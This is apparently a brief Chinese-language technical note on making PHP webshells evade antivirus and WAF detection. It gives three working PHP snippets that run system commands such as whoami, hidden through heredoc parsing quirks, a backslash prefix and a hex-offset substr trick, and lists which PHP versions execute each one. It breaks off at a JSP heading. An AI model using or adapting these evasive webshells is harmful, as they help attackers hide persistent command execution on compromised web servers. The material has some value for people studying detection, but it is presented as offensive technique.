webshell免杀

https://xz.aliyun.com/t/10937

https://xz.aliyun.com/t/10989

php 免杀

传统php免杀

变形 + 外部参数 =解析=waf防火墙==> 命令执行

语法报错->解析失败

php版本 语义出错 php命令执行

  1. 利用在高版本php语法不换行来执行命令
<?=
$a=<<< aa
assasssasssasssasssasssasssasssasssasssasssassss
aa;echo `whoami`
?>

5.2.17nts 版本报错

webshell免杀_可执行

5.3.29nts 报错

webshell免杀_webshell_02

5.4.45nts 报错

webshell免杀_asp_03

7.3.4nts 执行

webshell免杀_webshell_04

  1. 利用\特殊符号 引起报错
<?php
\echo `whoami`;?>

5.3.29nts 报错

webshell免杀_webshell_05

7.3.4nts 报错

5.2.17nts

webshell免杀_php_06

  1. 十六进制字符串
    7 不认为是数字
    5为数字
    5.3 5.5 可执行
    5.2 7 无法执行
<?php
$s=substr("aabbccsystem","0x6");
$s(whoami)
?>

jsp 免杀